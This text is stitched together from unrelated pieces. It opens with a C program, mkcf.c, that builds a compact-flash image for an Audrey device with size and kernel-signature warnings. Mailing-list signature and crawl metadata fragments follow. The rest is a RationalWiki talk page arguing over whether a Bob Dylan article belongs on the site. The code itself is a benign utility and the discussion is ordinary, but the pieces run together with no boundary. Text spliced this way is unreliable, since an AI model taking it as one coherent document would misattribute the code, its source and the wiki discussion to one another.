#define IMAGE_EMPTY_SPACE (AUDREY_FLASH_SIZE + IMAGE_TRAILER_SIZE +
IMAGE_FINAL_FILLER_SIZE)
/*
Flash card larger than 1 gigabyte? I doubt user wanted to do that.
I am so sure that I'll disallow it.
*/
#define RIDICULOUSLY_LARGE_NUMBER (1000 * 1024 * 1024)
#define TRUE (1==1)
#define FALSE (!TRUE)
typedef unsigned int uint32;
static uint32 get_file_size(FILE *f)
{
uint32 saved_position = 0;
uint32 file_size = 0;
saved_position = (uint32)ftell(f);
fseek(f, 0, SEEK_END);
file_size = (uint32)ftell(f);
fseek(f, (long)saved_position, SEEK_SET);
return file_size;
}
static char *copy_file_into_memory(char *file_name, uint32 *mem_size)
{
FILE *f = NULL;
char *file_buf = NULL;
*mem_size = 0;
f = fopen(file_name, "rb");
if (NULL != f) {
uint32 file_size = get_file_size(f);
if (file_size > 0 && file_size <= AUDREY_FLASH_SIZE) {
file_buf = (char*)malloc(file_size);
if (NULL != file_buf) {
uint32 bytes_read = 0;
bytes_read = fread(file_buf, 1, file_size, f);
if (bytes_read == file_size) {
fprintf(stderr, "Read file of size %d.\n", bytes_read);
*mem_size = bytes_read;
if (0x01000000 == bytes_read) {
fprintf(stderr, "WARNING: This image will
overwrite the IPL!\n");
fprintf(stderr, "That is OK if your image
contains an IPL, but ");
fprintf(stderr, "it risks destroying the
device permanently.\n");
fprintf(stderr, "Please be careful!\n");
}
if (0x00fc0000 != bytes_read &&
0x01000000 != bytes_read) {
fprintf(stderr, "WARNING: The input image is a
strange size. Be careful!\n");
}
if (bytes_read < 6 ||
!( 0xeb == (unsigned char)file_buf[0] &&
0x4c == (unsigned char)file_buf[1] &&
0x44 == (unsigned char)file_buf[2] &&
0x44 == (unsigned char)file_buf[3] &&
0x44 == (unsigned char)file_buf[4] &&
0x44 == (unsigned char)file_buf[5])) {
fprintf(stderr, "WARNING: The input image does
not appear to begin with a ");
fprintf(stderr, "Neutrino kernel.\nOdds are
high that your Audrey will stop ");
fprintf(stderr, "working if you flash this
image to it.\n");
}
} else {
fprintf(stderr, "Expected %d bytes but got %d instead.\n",
file_size,
bytes_read);
free(file_buf);
file_buf = NULL;
}
} else {
fprintf(stderr, "Couldn't allocate %d bytes.\n", file_size);
}
} else {
fprintf(stderr, "File was a weird size: %d.\n", file_size);
}
fclose(f);
} else {
fprintf(stderr, "Couldn't load file '%s.'\n", file_name);
}
return file_buf;
}
static uint32 compute_checksum(char *file_buf, uint32 file_size)
{
uint32 checksum = 0;
uint32 *p = (uint32 *)file_buf;
while (file_size != 0) {
checksum += *p++;
file_size -= sizeof(uint32);
}
return checksum;
}
static void serialize_uint32(uint32 n, FILE *f)
{
char c = '\0';
c = (char)(n);
fwrite(&c, 1, 1, f);
c = (char)(n >> 8);
fwrite(&c, 1, 1, f);
c = (char)(n >> 16);
fwrite(&c, 1, 1, f);
c = (char)(n >> 24);
fwrite(&c, 1, 1, f);
}
static void fill_empty(uint32 count, int is_flash, FILE *f)
{
char c = 0;
if (is_flash) {
c = (char)(0xff);
}
while (0 != count--) {
fwrite(&c, 1, 1, f);
}
}
static void print_help(void)
{
fprintf(stderr, "usage: mkcf afs_file_name afs_output_file_name "
"[flash_file_size default=%d]\n",
DEFAULT_COMPACT_FLASH_FILE_SIZE);
}
int main(int argc, char* argv[])
{
char *ifn = NULL, *ofn = NULL;
uint32 of_size = DEFAULT_COMPACT_FLASH_FILE_SIZE;
int result = 1;
char *file_buf = NULL;
uint32 file_size = 0;
if (1 == argc) {
print_help();
return 0;
}
if (argc > 1) {
if (0 == strcmp(argv[1], "-h") ||
0 == strncmp(argv[1], "--h", 3)) {
print_help();
return 0;
}
}
if (argc < 3) {
fprintf(stderr, "Missing arguments.\n");
print_help();
return 1;
}
ifn = argv[1];
ofn = argv[2];
if (argc >= 4) {
of_size = atoi(argv[3]);
if (0 == of_size || of_size > RIDICULOUSLY_LARGE_NUMBER) {
fprintf(stderr, "Requested output file size was unreasonable.\n");
return 1;
}
}
file_buf = copy_file_into_memory(argv[1], &file_size);
if (NULL != file_buf) {
FILE *out = NULL;
uint32 checksum = 0;
checksum = compute_checksum(file_buf, file_size);
fprintf(stderr, "File checksum is %8x.\n", checksum);
out = fopen(argv[2], "wb");
if (NULL != out) {
fprintf(stderr, "Creating output file '%s' of size %d...",
argv[2],
of_size);
fwrite(file_buf, 1, file_size, out);
fill_empty(AUDREY_FLASH_SIZE - file_size, TRUE, out);
fill_empty(of_size - IMAGE_EMPTY_SPACE, FALSE, out);
serialize_uint32(file_size, out);
serialize_uint32(0, out);
serialize_uint32(IMAGE_SIGNATURE, out);
serialize_uint32(checksum, out);
fill_empty(IMAGE_FINAL_FILLER_SIZE, FALSE, out);
fclose(out);
fprintf(stderr, "done!\n");
result = 0;
} else {
fprintf(stderr, "Couldn't open output file %s.\n", argv[2]);
}
free(file_buf);
}
return result;
}
END mkcf.c
--
Raleigh Apple
twitch@... | http://sourceforge.net/p/misterhouse/mailman/misterhouse-users/?viewmonth=201107&viewday=6 | CC-MAIN-2014-41 | refinedweb | 1,704 | 64.1 |
...
Here is a pop quiz for language aficionados.
Examine the following class:
public
class Foo
{
public
...
The skill of writing is to create
a context in which other people can think.
-- Edwin Schlossberg
Jeff Atwood presents a visual
contrast of two WPF books in "How Not To Write A
Technical Book". I haven't read either WPF book, but Jeff's post did provoke some
thinking…
Color Me Code...
Your...
MSDN says the List.ForEach method will "perform the specified action on each element of the List".
The following program does print out a haiku to the console, but does not make the haiku all lowercase.
using System;
using System.Collections.Generic;
class WWWTC
{
static void Main()
{
List<string> haiku = new List<string>();
haiku.Add("All software changes");
haiku.Add("Upon further reflection -");
haiku.Add("A reference to String");
// make it lowercase
haiku.ForEach(
delegate(string s)
{
s = s.ToLower();
}
);
// ... and now print it out
haiku.ForEach(
delegate(string s)
{
Console.WriteLine(s);
}
);
}
}
What's wrong?
J...
D...
My:
Every JavaScript function is an object.
Every JavaScript function has an execution context.
I think these concepts are keys to understanding modern JavaScript libraries. I hope that driving home these
two concepts will let a developer understand what the following code is doing,...
The......
Subscribe in a reader
(c) 2003-2009 OdeToCode LLC
K. Scott Allen
This theme is missing your touch... | http://odetocode.com/blogs/scott/archive/2007/04.aspx | crawl-003 | refinedweb | 231 | 70.7 |
Intro by Niko Laskaris
We recently released a code-based custom visualization builder called Custom Panels. As part of the rollout, we’re featuring user stories from some of the awesome Researchers using Comet as part of their R&D toolkit. One of these teams, Pento.ai, are long-time Comet users and were part of the beta test group for Custom Panels. Pento is a top machine learning consulting firm working with some of the biggest companies in the world. We were excited to see what they’d come up with given the freedom to build any visualization they wanted, and we weren’t disappointed.
Comet Custom Panels at Pento.ai
Written by Pablo Soto and Agustin Azzinnari
Pento is a company specializing in building software solutions that leverage the power of machine learning. By incorporating data and learning into our clients’ processes, we help them make optimal decisions or even automate entire processes.
There are many consulting companies out there all with a similar offering so, since the beginning, we’ve tried to take a novel approach. Pento is composed of a group of partners that have ample experience in the industry, delivering solutions with real and measurable results.
Having this autonomy allows us to cover a lot of ground while being highly specialized: we are partners with a proven track record in computer vision, in predictive analytics, as well as natural language processing. We’ve also been able to let this focus spill over to the open source community we leverage so much from, by contributing with tools such as our human perception library, Terran.
In the market today, Machine learning is a highly sought-after skill. Many companies are popping up left and right to fill this gap left by the new advances in the area. However, not every ML project goes according to plan. There are many, many aspects one needs to balance at the same time.
As such, ML engineers need to make use of all the tools at hand to ensure this process goes smoothly. We’ve found Comet, in particular, to be one of the tools that have permanently found a place in our toolbox.
Being organized and clear when delivering results is one of the key points to a successful ML initiative. If the series of steps one takes in order to make an automated decision isn’t clear, or simply if the client doesn’t understand the results presented, the project is bound to fail.
Due to this, it’s crucial to keep track of all your experiments, to understand and preserve a record of all of your research over the course of a project. If these experiments take hours or even days to run, we’ll forget why we ran them in the first place. Here’s where we’ve found tools such as Comet to be extremely useful: centralize data for all experiments, attach all the metadata we need to them, visualize intermediate results, and be able to quickly reproduce them.
Working with one client after another, we end up re-using the same visualizations and analytical tools over and over, leveraging the experience acquired in one project for the next one. Given that machine learning is an incremental process, we are constantly tweaking our code and systems and carrying them over to our next project. The Custom Panels feature in Comet is a step towards perfecting that re-usability.
Good visualizations are key to any successful ML project, but this is especially true for Computer Vision (CV) projects. In the following section, we will present a simple CV project, and explore how we can use Comet to improve our experimentation process. We’ll be using our open-source human perception library, called Terran, in order to illustrate the process we’d normally do in a real project.
What’s Terran?
Terran is a human perception library that provides computer vision techniques and algorithms in order to facilitate building systems that interact with people. Whether it’s recognizing somebody by their face, or detecting when they raise their hand, Terran provides the primitives necessary to act in response to a person.
Building a panel
The example project will consist of a simple program that detects faces in a video. In order to do this, we’ll be using three key functionalities from Terran: face detection, recognition and tracking. We’ll implement a custom visualization that’ll help us understand how our program is performing. A common technique to do this is to plot the face embeddings generated by Terran as points on a plane to see if these points are reasonably structured.
For instance, we might train an image classifier, embed these internal representations into a 2-dimensional space, and check that images of the same classes are embedded in nearby regions of this resulting space. If this assumption doesn’t hold, it’s possible our samples are under-represented or even mislabeled, or that there’s an issue with our classifier, so it’s a good thing to check every once in a while.
In our example, we are going to generate the proposed embedding visualizations using the results of our face detection and recognition, and then make sure that faces corresponding to the same person are indeed placed nearby. Here is the video we’ll be using:
First, let’s go with the traditional, fully Python, approach:
We perform face detection and feature extraction on each frame of the video using Terran, which is as simple as using the face_tracking and extract_features functions. By feature extraction we mean retrieving a 1024-dimensional representation for each face, where faces that are similar (and thus probably correspond to the same person) have a small cosine distance between them.
from terran.io import open_video from terran.face import Detection, extract_features from terran.tracking import face_tracking
video = open_video( '', batch_size=64 )
tracker = face_tracking( video=video, detector=Detection(short_side=832), )
faces = []
features = []
for frames in video:
faces_per_frame = tracker(frames)
features_per_frame = extract_features(frames, faces_per_frame)
for frame, frame_faces, frame_features in zip( frames, faces_per_frame, features_per_frame ): for face, feature in zip(frame_faces, frame_features): face_crop = crop_expanded_pad( frame, face['bbox'], factor=0.0 ) faces.append(face_crop) features.append(feature)
Perform dimensionality reduction over these representations by using t-SNE:
from sklearn.manifold import TSNE reduced = TSNE( n_components=2, perplexity=20.0, n_iter=5000, metric='cosine', n_jobs=-1 ).fit_transform(embeddings)
And finally, use the TSNE results to get closest neighbors to each points:
from scipy.spatial.distance import cdist
k = 5 d = cdist(reduced, reduced) neighbors = d.argsort(axis=1)[:, 1: k+1]
Even though Python visualizations can be helpful, they are still static, which makes it difficult to navigate through the results without re-running it each time with different values. Even more, it’s really hard to keep track of the visualizations for each experiment, especially if we have to manually generate them on every run. All of this makes the experimentation process slow and error-prone.
Fortunately, Comet has found a solution for this with Panels. By providing a flexible interface they allow us to create custom interactive visualizations that integrate seamlessly with the rest of Comet’s features, such as asset logging and experiment comparisons.
Extending our example above to use Comet’s Panels is really simple. The following diagram shows how everything fits together. So far we have implemented the blue and green boxes. Now we need to implement the Comet integration (orange).
The first thing we need to do is to upload all the data required by the visualizations. In our case, it means uploading the face crops from step 2 and the face embeddings from step 4 (that is, the 2-dimensional embeddings, so we use up less storage).
We’ll do this from within our Python training code, following the usual steps we go through when using Comet:
1. We first create the experiment:
experiment = Experiment(‘API-KEY’)
2. Then log the necessary assets. First the face crops:
for face_name, face in enumerate(faces): experiment.log_image(face, name=face_name)
3. Then the embeddings and the pre-calculated neighbors data
data = dict(
x=reduced[:, 0].tolist(),
y=reduced[:, 1].tolist(),
faces=[f'#{face_id}' for face_id in range(len(faces))],
neighbors=neighbors.tolist()
) experiment.log_asset_data(data, name='tsne.json')
Now that we have the data available in Comet, we need to build the Panel. The basic interface to be implemented by our Panel is the following:
class MyPanel extends Comet.Panel {
setup() {
// Configuration.
}
draw(experimentKeys, projectId) {
// Select experiment.
this.drawOne(selectedExperimentKey);
}
drawOne(experimentKey) {
// Create and initialize the chart.
}
}
The
setup method is a good place to define all the configurations for your panel. In our case we defined some options for our Plotly chart:
setup() {
this.options = {
layout: {
showlegend: false,
legend: {
orientation: "h"
},
title: {
text: "Embeddings TSNE"
}
}
};
}
Our Panel only works to visualize data from a single experiment, therefore we need to apply the approach described here. For the
draw method, we select the experiment we want to explore, while in the
drawOne method, we create the actual plot. In order to build the plot, we need to fetch the data we uploaded to Comet by using the Javascript SDK:
drawOne(experimentKey) {
// Instantiate Plotly chart.
// Fetch face images.
this.api.experimentImages(experimentKey)
.then(images => {
// Fetch tSNE coordinates and nearest neighbors data.
this.api.experimentAssetByName(experimentKey, "tsne.json")
.then(result => {
// Draw points in chart.
});
});
}
Once we have the data we need in the panel, we can make use of all the Javascript, HTML and CSS ecosystem to create our custom visualization.
To view our custom panel, check out our public Comet project here.
Conclusion
Machine learning is a new addition to software engineering. A whole new set of difficulties and possibilities arise. However, just like the software industry was still searching for ways to tackle projects in a more principled manner at the end of the last century, so as to make the whole process less uncertain, it is now searching for better ways to incorporate ML into the development process.
Part of this evolution is done by making practices more robust and reproducible, and tools such as CometML are contributing towards that goal. As practitioners, we very much welcome such initiatives. | https://www.comet.ml/site/pentoai-panels-for-computer-vision/ | CC-MAIN-2020-40 | refinedweb | 1,698 | 53.21 |
Odoo Help
This community is for beginners and experts willing to share their Odoo knowledge. It's not a forum to discuss ideas, but a knowledge base of questions and their answers.
oerplib not working to connect with SAAS instance
Hi, I am trying to connect to SAAS instance using oerplib, with following commands, but it's throwing an error:
import oerplib
oerp = oerplib.OERP('hostname', protocol='xmlrpc+ssl', port=443, version='9.0c')
oerp.login('username', 'password', database='flyv')
Error:
Can anyone please help me, where us a magnifying glass? :-)
The error is clear...
The XML is pos_debt_notebook.debt_account is not found in the system...
Maybe you can try to update your module 'pos_debt_notebook'
That is a call from pos_bizzcloud who try to access this xmlid
Thanks guys. Got it fixed. pos_debt_notebook module was having some issue at remote side. | https://www.odoo.com/forum/help-1/question/oerplib-not-working-to-connect-with-saas-instance-106223 | CC-MAIN-2016-50 | refinedweb | 141 | 68.16 |
NAME¶
random, urandom - kernel random number source devices
SYNOPSIS¶
#include <linux/random.h>
int ioctl(fd, RNDrequest, param);
DESCRIPTION¶.
Since Linux 3.16, a read(2) from /dev/urandom will return at most 32 MB. A read(2) from /dev/random will return at most 512 bytes (340 bytes on Linux kernels before version 2.6.12).
Writing to /dev/random or /dev/urandom will update the entropy pool with the data written, but this will not result in a higher entropy count. This means that it will impact the contents read from both files, but it will not make reads from /dev/random faster.
Usage¶.¶
If your system does not have /dev/random and /dev/urandom created already, they can be created with the following commands:
mknod -m 666 /dev/random c 1 8 mknod -m 666 ] && interfaces¶) interface¶
The following ioctl(2) requests are defined on file descriptors connected to either /dev/random or /dev/urandom. All requests performed will interact with the input entropy pool impacting both /dev/random and /dev/urandom. The CAP_SYS_ADMIN capability is required for all requests except RNDGETENTCNT.
- RNDGETENTCNT
- Retrieve the entropy count of the input pool, the contents will be the same as the entropy_avail file under proc. The result will be stored in the int pointed to by the argument.
- RNDADDTOENTCNT
- Increment or decrement the entropy count of the input pool by the value pointed to by the argument.
- RNDGETPOOL
- Removed in Linux 2.6.9.
- RNDADDENTROPY
- Add some additional entropy to the input pool, incrementing the entropy count. This differs from writing to /dev/random or /dev/urandom, which only adds some data but does not increment the entropy count. The following structure is used:
struct rand_pool_info {
int entropy_count;
int buf_size;
__u32 buf[0]; };
- Here entropy_count is the value added to (or subtracted from) the entropy count, and buf is the buffer of size buf_size which gets added to the entropy pool.
- RNDZAPENTCNT, RNDCLEARPOOL
- Zero the entropy count of all pools and add some system data (such as wall clock) to the pools.
FILES¶
/dev/random
/dev/urandom
NOTES¶
For an overview and comparison of the various interfaces that can be used to obtain randomness, see random(7).
BUGS¶
During early boot time, reads from /dev/urandom may return data prior to the entropy pool being initialized.
SEE ALSO¶
mknod(1), getrandom(2), random(7)
RFC 1750, "Randomness Recommendations for Security"
COLOPHON¶
This page is part of release 5.10 of the Linux man-pages project. A description of the project, information about reporting bugs, and the latest version of this page, can be found at. | https://dyn.manpages.debian.org/testing/manpages/urandom.4.en.html | CC-MAIN-2021-49 | refinedweb | 436 | 53.81 |
On Thu, Mar 03, 2011 at 10:46:23PM -0600, Ron Johnson wrote: > I have the dusty book "Teach Yourself C++ 4th Ed" by Al Stevens, > from... 1995 and wonder that if I go thru it will I screw myself up > because of new language features. You will certainly find it confusing. Most, if not all, code examples will fail to compile, and you will be learning the wrong way to do things. C++ was not standardised (both language and standard library) until 1999. This book is pre-standardisation. The main issue you'll run into is that the headers were all renamed, and namespaces were introduced. For example: #include <iostream.h> int main () { cout << "Hello world" << endl; } is now #include <iostream> int main () { std::cout << "Hello world" << std::endl; } (You can use "using std::cout;" to remove the need to use std:: every time.) But these are the most superficial differences. You would be able to use the book and make those corrections as you go through. But you would miss out entirely on newer features, most of which you'll probably want to use (even if you don't realise this at the start): references, namespaces, templates are good examples. But this is just the beginning. The main power of C++ comes though its standard library, especially its containers and algorithms. And then there's Boost, which is like the standard library, but better, with the kitchen sink, and on steroids. And perhaps even more importantly, the features are just features; the most important things to learn are the design skills and idioms which will make your code both efficient and robust. I found this invaluable: In particular has some useful recommended texts. Being a learning by example person, I found the "official" Stroustrup text dry and uninspiring, unreadable even. I've heard good things about Koenig and Moo's Accelerated C++. 
I used "Practical C++ Programming" (O'Reilly) which covers the ISO standard C++, but isn't that amazing, and "Teach yourself C++ for Linux in 21 days" (SAMS), which is old pre-Standard but comes with lots of examples. Both only cover the core language, not the standard library except superficially. I bought a copy of Josuttis' The C++ Standard Library, which is an excellent guide and reference, but it does require learning the language first. Also, for later: Debian got the latest version in unstable just this week. If you would like to see some examples of modern C++, you could take a look at schroot. "apt-get source schroot", or have a browse around here:;a=tree;f=sbuild; This makes use of - templated exceptions - templated containers (map, list, vector) - some inheritance (mainly containment and delegation) - TR1/Boost smartpointers (shared_ptr, weak_ptr) for automatic reference-counted memory management, and tuples - Boost.Regex regular expressions - Boost.Program_options options parsing - Boost.Iostreams file descriptor streams to mix streams with basic systems programming and file locking [standard iostreams don't allow you to create a stream from a file descriptor, let along to locking etc.] - Boost.Filesystem for convenient filesystem functions (creating paths recursively etc.) It also includes a whole bunch of other stuff such as splitting strings into lists of strings and vice-versa (like perl split and join). If there's one thing I'd recommend learning to use, it's std::tr1::shared_ptr (boost::shared_ptr) from C++03. This gives you completely automatic reference-counted memory management. Whereas in C or old-style C++, you would do foo *alloc = malloc(sizeof(foo)); foo *alloc = new foo(); with shared_ptr you do this: std::tr1::shared_ptr<foo> alloc(new foo()); The advantage is that the former two require a manual free() or delete. The shared_ptr will free the memory when its destructor is run (when it goes out of scope). 
This is much easier to get correct that manual management, and is exception-safe. This means that in practice, you'll never see a "raw" pointer in good C++. One of the key things C++ allows that isn't in most of the books are idioms such as RAII (resource acquisition is initialisation), of which smartpointers are one example. Regards, Roger -- .''`. Roger Leigh : :' : Debian GNU/Linux `. `' Printing on GNU/Linux? `- GPG Public Key: 0x25BFB848 Please GPG sign your mail.
Attachment:
signature.asc
Description: Digital signature | https://lists.debian.org/debian-user/2011/03/msg00333.html | CC-MAIN-2015-32 | refinedweb | 718 | 63.39 |
Talk:Bob Dylan
Please don't fuck with The Bard. He's good as goats.--PalMD-Goatspeed! 12:41, 30 July 2007 (CDT)
- Agreed. There must be a limit somewhere. --AKjeldsenGodspeed! 14:11, 30 July 2007 (CDT)
Contents
mission doubt[edit]
Why do we need an article on this creep with green teeth? Sprocket J Cogswell (talk) 05:50, 30 December 2010 (UTC)
- Yes we could ask the same question of many of our musician articles. What happens is that someone writes about their favorite musician with some tangential reference to the mission. The existence of that article then becomes the justification for the next musician article and so on. But to answer your question I'm not sure why we have this article.--BobSpring is sprung! 09:32, 30 December 2010 (UTC)
- While I concur that this article does seem off mission, I must ask: What the fuck is wrong with Bob Dylan? I love this man. But, yeah, that article isn't really on-mission. The Goonie Punk Can't sleep, clowns will eat me! 16:13, 30 December 2010 (UTC)
- There is nothing whatsoever wrong with him in my opinion. The only question is why there should be an article about him here.--BobSpring is sprung! 16:52, 30 December 2010 (UTC)
- No, but if we delete it, I think the comment should read "With all due respect to the man, of course. Lord of the Goons The official spikey-haired skeptical punk 16:54, 30 December 2010 (UTC)
- Bob Dylan is awesome, and while this article is not really on-mission, why is it worthy of deletion? And if it really is that bothersome due to being off-mission, we could move it to the "Fun" namespace.--Colonel Sanders (talk) 17:02, 30 December 2010 (UTC)
- Fun space sounds good to me. Lord of the Goons The official spikey-haired skeptical punk 17:03, 30 December 2010 (UTC)
- All concur? If so, I'm moving it.--Colonel Sanders (talk) 17:05, 30 December 2010 (UTC)
- (EC) It might be a good idea to have a look at the musicians category before singling out Mr Dylan for exile. Personally I think most of them should be in fun, but you never know what sort of HCM might be involved when dealing with people's favourite musicians.--BobSpring is sprung! 17:08, 30 December 2010 (UTC)
- I will do that now. I would never single out Bob Dylan. I will probably have to move most of the musician articles to the fun space, like Elvis Presley.--Colonel Sanders (talk) 17:11, 30 December 2010 (UTC)
Respect is something that needs to be earned and maintained. I'd have thought that notion was at the core of the RW mission.
At one time I could get through the slightly crooked structure of Mr. Tambourine Man without stumbling, and was fond of listening to his other singing. I remember a fair amount of the sixties.
Mr. Zimmerman was human like the rest of us. For all his celebrity, he showed up with muddy feet once in a while, and I will not worship at them. Though I have no citation to provide, by some accounts he was not the kind of person I would want to spend time with. The times they were a-changing, and times have moved past that guy. I suppose you may call it "fun" if you like, but to me the article looks like a wall of unfun text. Sprocket J Cogswell (talk) 18:27, 30 December 2010 (UTC)
All right
Before I mass move musician articles, any comments?--Colonel Sanders (talk) 17:13, 30 December 2010 (UTC)
I'm not adept at posting on talk-boards with software like this, so I'm not confident this will be able to be read by those to whom I'm responding...but here goes:
Apparently, a bunch of y'all herein think my bumping up of someone's earlier sketch into a full-blown mini-bio of Dylan is at odds with the rationality theme of RationalWiki. Is that a fair summation of your collective position?
If so, this is unfortunate. For I've always considered my bedrock personal rationality--steadfast agnosticism, rejection of all belief-system silliness from crystals and past-lives to Mormonism and Scientology--to be the very basis of my appreciation of Dylan's contributions, ergo my enduring interest in him. The kind poster "Colonel Sanders" called me a "fan", but much more accurately, I'm just a longtime observer who is more frequently critical of the artist in recent decades than laudatory. In fact, I've always found most of his stage work and too much of his recording downright embarrassing, hence the employment of the word "laughable" in my conclusion. Not much of a "fan", you would agree?
Any reader will notice, however, that throughout--or at least prior to your collective redaction--I particularly focussed on behavior, quotes and other hints as to the famously-inscrutable Dylan's intellectual orientation regarding the reason-vs.-faith struggle that none of us herein are fence-sitters regarding.
Sir "Sanders" also graciously invited me to register with this Wiki, but that seems to me to be easier said than done! In any event, I'll try registering again, although I'm betting that is now pointless, given the tone I seem to have inadvertently generated.
Sorry if I annoyed you folks, although I hope you'll understand that it was wholly unintentional. I just figured other folks who deal in reason rather than emotion, who might very well have only been familiar with the standard--and profoundly simplistic-- spokesman-of-a-generation summary of this favorite-of-the-intellectuals recording artist, would probably greatly appreciate an overview from someone who had for a good while a pretty comprehensive perspective.
Am I to presume I'm implicitly disinvited from further contributions on this and, for that matter, any of the other entries about which I might have some worthwhile information?
Thanks for reading, and may we all have a terrific 2011.
JOKERMAN [for lack of a better nom de edit]— Unsigned, by: 99.99.22.25 / talk / contribs
- Jokerman, you have it all wrong. It is indeed an excellent article and I will consider moving Bob Dylan back. But the reason I moved musicians to this namespace is that most of the musician articles are written by "fans" and really are off-mission. If you really insist on this being in mainspace as an analysis of the contributions of Mr. Dylan (as opposed to his musical contributions, as you stated you have done in your post), I will invite a consensus of interested users. And you may continue edits to this article as you please, but if you wish to move it into mainspace, it must conform to RationalWiki's mainspace rules, which most musician articles do not. And you are still invited to create an account on this website by clicking on the Log in/Create an Account button in the top right hand corner of any page, then pressing the "Create an Account" button in the log-in box and following the instructions, mainly so you can be attributed for your contributions. Thank you for your civility and concern.--Colonel Sanders (talk) 18:30, 30 December 2010 (UTC)
- Jokerman, it seems to me like you have a thick enough skin to deal with this mob appropriately. I only hang around the edges of it, so take this with a grain of your own high-quality salt. I suppose I need to go read through the article you have made such a massive scholarly contribution to, sifting it for mission-related messages. Be well, and have a fantastic 2011! Sprocket J Cogswell (talk) 18:33, 30 December 2010 (UTC)
- Hi Jokerman. The thing is that all the musician articles are a bit doubtful in terms of our objectives. See here for a description of what should be in our articles.
- You saw the existing article and decided to improve it. You put a lot of work into it and it was very good - it was really our fault to leave it in mainspace as an implicit invitation to be improved upon. You will see that it has not been deleted - simply moved out of the main article space.
- You are absolutely most welcome to edit any articles here which fit with the mission statements on the main page. Please stick around, and if you're having any problems creating an account feel free to ask in the bar. Cheers.--BobSpring is sprung! 20:04, 30 December 2010 (UTC)
Response to Colonel Sanders's clarification
Dear "Colonel",
Much appreciate the good will!
First off, you need not worry about my possibly "moving" the Dylan entry to this or that other sector of RationalWiki; I wouldn't have a clue how to accomplish that, as I'm less skilled at software navigation than I am at particle physics--and I find superstring theory as difficult as divining Dylan's mindset in the wake of his Christian interlude! Indeed, I was surprised that so much of my textual enhancement of the original posters' Dylan efforts ended up looking like I intended it to.
That said, I would never have meddled herein if the overriding theme of RW was anything BUT rationality. As evidence of my own good will, I've never even attempted to edit the justifiably lengthy WikiPedia entry on Dylan, even when spotting factual errors. (I figure others will eventually do so, and in each instance I've been borne out.)
But my principal point is that, if not for my rationality, I doubt I would have ever recognized Dylan as much more than a guy with a funny nose, funnier hair and the funniest voice. (That's actually a code-phrase I developed during my lengthy professional broadcast career to be able to cite him when necessary without ever naming him, given that his influence continually pops up in the oddest corners of the culture and thus mandates mention, but I understood well any frequency greater than about one named citation per month would have contaminated my various general-interest programs over the years as those of a hopeless "Dylan freak".)
Yet I am rational to a fault--or so I'm often told--and long ago reached the seemingly preposterous conclusion Dylan has a claim on being the most original creative force ever; indeed, I e-published a monograph with that very thesis a few years ago, and it has never been lost on me that the more reason-based the crowd I'm hanging with, the more they seem to recognize that Dylan is far beyond being just another gifted aging rock star past his prime.
That's really all that was behind this, and I'm flattered you found my re-working and expansion of earlier posters' work to be well-written.
By the way, in the late '80s, in anticipation of Dylan sometime finally making good on a 1980 offer to let me interview him--while I've had quite a few conversations with the artist beginning in 1975, each has been informal--I crafted a question designed to reveal his post-Christian-period faith orientation, i.e., whether he in fact has rejected his onetime supposed born-again status. It's an imperfect question, mind you, because it is one he can easily lie in response to...but ONLY if he no longer considers himself "saved". (That he once did actually so believe sincerely seems to me to be clear; indeed, in that very 1980 conversation, a lengthy sit-down chat which was more relaxed and apparently sincere than maybe any of my other conversations with him, he inquired as to whether I myself was also saved. [Talk about insincerity: throwing caution to the wind, I actually fibbed in response, claiming I was Jewish to avoid any possible hassle, even though it would be a decade before I formally converted...and then only through the atheistic/agnostic Society for Humanistic Judaism.]) Anyway, that night in October 1980 there was no hint--unlike during most Dylan chats--the artist was in one of his various BSing modes.
But again, to avoid in the future his possibly misleading me on this key question as much as I misled him on his saved-or-Jewish-or-heathen inquiry (rather limited menu of choices, eh?), I eventually worked up a question that can be hugely revealing. That is, if Dylan today REMAINS in the mental clutches of fundamental Christianity, he CAN'T reply in anything other than the affirmative. So what is this golden question, one which I've run by numerous Christian clergymen over the years to confirm its religious airtightness? Simple: "Bob, do you still recognize Christ as your personal savior?"
Alas, I no longer expect to get the chance to someday pose it, but y'know, Dylan's people claim I was nearly granted an interview during a recent leg of his now-fabled Neverending Tour, so who knows, er, when my ship comes in? Then again, even if it does come to pass, I may end up like Dylan's own lyrical (and biblical) Goliath, and I "will be conquered". But hey, one can sure do a lot worse in life than to be outsmarted by Dylan.
In the meantime, thanks for your gracious clarifications, and now let's all sit back and marvel at how 2011 unfolds! (Think there's much chance Zeus will make a Second Coming?)
Appreciatively, JOKERMAN, somewhere in Dylanology — Unsigned, by: Jokerman / talk / contribs 21:48, 30 December 2010 (UTC)
- You're welcome. We appreciate your marvelous work on the entry. I hope to see further contributions from you, as you are very wise and rational indeed. You could be an excellent contributor. I am not positive about Zeus making a second coming, but anything is possible. Happy 2011,--Colonel Sanders (talk) 22:19, 30 December 2010 (UTC)
Live Aid[edit]
Didn't Bob Geldof blast Dylan for mentioning some of the Live Aid money be given to US farmers? GooRoo (talk) 07:36, 31 December 2010 (UTC)
I've never heard that previously, "Roo". But if Geldof DIDN'T, he probably should have. For however well-intentioned--and influential!--Dylan's remarks were (Rolling Stone rhapsodized, "Proof positive that when Dylan mutters, the world still listens"), it was still inappropriate for Dylan to have gone so wildly off-message, especially given the conspicuousness afforded his encore-preceding slot in a 15-odd-hour affair. JOKERMAN
Bronze?[edit]
I think so.--Colonel Sanders (talk) 05:38, 18 July 2011 (UTC)
Mission.[edit]
Could someone explain to me again what this has to do with us?--BobSpring is sprung! 21:07, 25 November 2011 (UTC)
- <_< >_> yeah, I got nothing. Тytalk 02:07, 5 December 2011 (UTC)
- me neither. We could at least cut out all the post-60's stuff. The only potentially missionish thing about him are his protest songs, and even that could be merged into an article about the sixties protest movement. Sophiebecause liberals 20:09, 15 February 2012 (UTC)
- It's very mission, if you choose to make it that way. He is a symbol of the liberal movement in the US, often cited by both the right and the left regarding his role in society. Besides that, if well written, some articles are here because we just like the subject. And there's nothing wrong with that. *if well written*. This one has a long way to go.
- and this, right here "Dylan is often credited, along with The Beatles, as being one of the major forces propelling rock-and-roll, and popular music generally, into territory where it could explore complex ideas about life, poetry, politics, religion and philosophy." is exactly why it's on mission. He's a thinker, a philosopher - he'd be a Rational Wikian, if he gave a shit about the internet.
GodotGrow a vagina 20:25, 15 February 2012 (UTC)
- On this basis we can have articles on the Spice Girls, Enrico Caruso and George Formby, as you can always find something vaguely on-mission.
- It will probably get a bit repetitive with musicians as well, as we will probably end up saying generally similar things about all the protest songwriters of the '60s, for example.--BobSpring is sprung! 20:42, 15 February 2012 (UTC)
